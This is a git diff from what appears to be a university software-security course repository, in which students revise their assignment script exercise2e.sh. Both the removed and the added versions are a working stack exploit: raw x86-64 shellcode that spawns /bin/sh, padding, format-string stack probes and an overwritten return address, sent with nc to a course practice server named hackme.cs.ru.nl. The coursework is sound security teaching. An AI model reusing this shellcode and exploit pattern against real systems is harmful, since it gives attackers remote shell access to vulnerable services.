Finished assignemnt 5b

[sws1-1415.git] / ass5b / mart / sws1-assignment5b-s4109503-s4202015 / exercise2e.sh

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
index 2f62e90..0839a7b 100644 (file)
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
@@ -1,11 +1,10 @@
-shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
-
-#Illegal instruction
-returnvalue="\x7f\xff\xf7\xff\xeb\x30"
-fillers=$(printf "%42s" | sed 's/ /\\x0f\\x1f/g')
-
-returnvalue="\x7f\xff\xf7\xff\xeb\x30"
-fillers=$(printf "%39s" | sed 's/ /\\x0f\\x1f/g')
-
-
-cat <(echo -e "${fillers}${shellcode}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266
+{      # Print padding and stack inspection
+       printf "......%34s" | sed 's/ /%p/g'
+       # Print shell code
+       printf "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1"
+       printf "\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+       # Overwrite frame pointer and top of stack pointer print return address
+       printf "%16s\x50\xeb\xff\xff\xff\x7f\n"
+       # Start reading from stdin and echoing it to stdout
+       cat
+} | nc hackme.cs.ru.nl 2266